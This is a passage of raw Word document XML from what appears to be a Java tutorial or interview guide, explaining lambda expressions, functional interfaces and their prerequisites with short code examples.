      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lambda expressions are intended to be used with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (interfaces that contain exactly one abstract method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619736C0" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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an Be Used for Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lambda expressions are a fundamental feature of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, allowing you to pass behavior as an argument and enabling operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</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filter</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reduce</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011C59D7" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ess Boilerplate Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They reduce the need for writing full anonymous class implementations, which is especially useful in event handling or when passing functions as arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF4AC6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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ypes of Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD45436" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda expression that takes no parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF8F75" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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Runnable r = () -&gt; System.out.println("Hello, world!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F4E4D" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ne Parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda expression with a single parameter (the parentheses can be omitted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0BAECC" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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sumer&lt;String&gt; greet = name -&gt; System.out.println("Hello, " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473DA53F" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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reet.accept("Alice"); // Output: Hello, Alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F93343" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ultiple Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda expression with multiple parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D304EDB" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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iFunction&lt;Integer, Integer, Integer&gt; add = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E0644" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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add.apply(5, 3)); // Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39534F52" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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pression Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda with a single expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C16D6DA" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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nction&lt;Integer, Integer&gt; square = x -&gt; x * x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D4FC6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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square.apply(4)); // Output: 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022A2BF6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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lock Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda with a block of code, typically when more than one statement is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5255B" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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nction&lt;Integer, Integer&gt; increment = x -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D540" w14:textId="6A8A7505" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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result = x + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFC3C7" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC686BA" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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D2B7AD0" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">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increment.apply(5)); // Output: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68137778" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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Benefits of Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB24BD" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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ise and Readable Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They eliminate boilerplate code like creating anonymous class implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D40F2" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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nables Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lambda expressions enable functional programming features, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map</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filter</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reduce</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C517F65" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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mproved Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With less code, there’s less chance of introducing bugs, and the code is easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D912CB8" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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upports Parallel Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions support easier parallelism with streams, allowing for more efficient processing of large data sets in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D5F52" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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with Collection and Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE8369"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C343CF2"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function.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B12D5AC" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9C0572"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LambdaExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889B7B5"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56599E07"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String&gt; names = Arrays.asList("John", "Alice", "Bob", "Charlie");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47105560" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A80DC1"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sing lambda expression to iterate through list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422482B3"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names.forEach(name -&gt; System.out.println(name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6E1D9"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C030CFC"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sing lambda expression to filter and print names starting with "A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C160081"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names.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E305A"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lter(name -&gt; name.startsWith("A"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4831BE38"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orEach(name -&gt; System.out.println(name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B35CC"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12BA994"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3155DC5" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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25BB2197" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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Lambda expressions in Java allow you to express </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instances of single-method interfaces (functional interfaces)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a much more concise and readable manner. They are widely used with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and in many areas where functional programming techniques are applied. Lambda expressions help write cleaner and more maintainable code and encourage the use of functional programming paradigms within Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568ED95" w14:textId="727D5D1E" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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9A96465">
          <v:rect id="_x0000_i1685" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B6470" w14:textId="2323BEB9" w:rsidR="00AE2040" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE2040">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Toc196307699"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the prerequisite for Lambda Expression?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w14:paraId="1C3F74F5" w14:textId="33F77155" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">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o effectively use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, you need to meet the following prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976911A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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Java 8 or Later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A971D4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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Lambda expressions were introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, so you need to use Java 8 or a later version of Java to leverage lambda expressions. You can check your Java version with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380B49F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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 -version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E131A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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Functional Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F9008" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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Lambda expressions are intended to work with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which are interfaces that have exactly </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. A functional interface may have any number of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>default</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static methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it must have only one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69555699" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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of a functional interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E827AB" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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nctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4676CE" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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MyFunction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4892B4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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apply();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3730E360" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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98FA793" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97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can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation, which is optional but helps identify a functional interface and ensures the interface has only one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C9A1A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70E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Familiarity with Functional Programming Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50C045" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ile not a strict requirement, understanding the basics of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can make using lambda expressions easier. Concepts like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
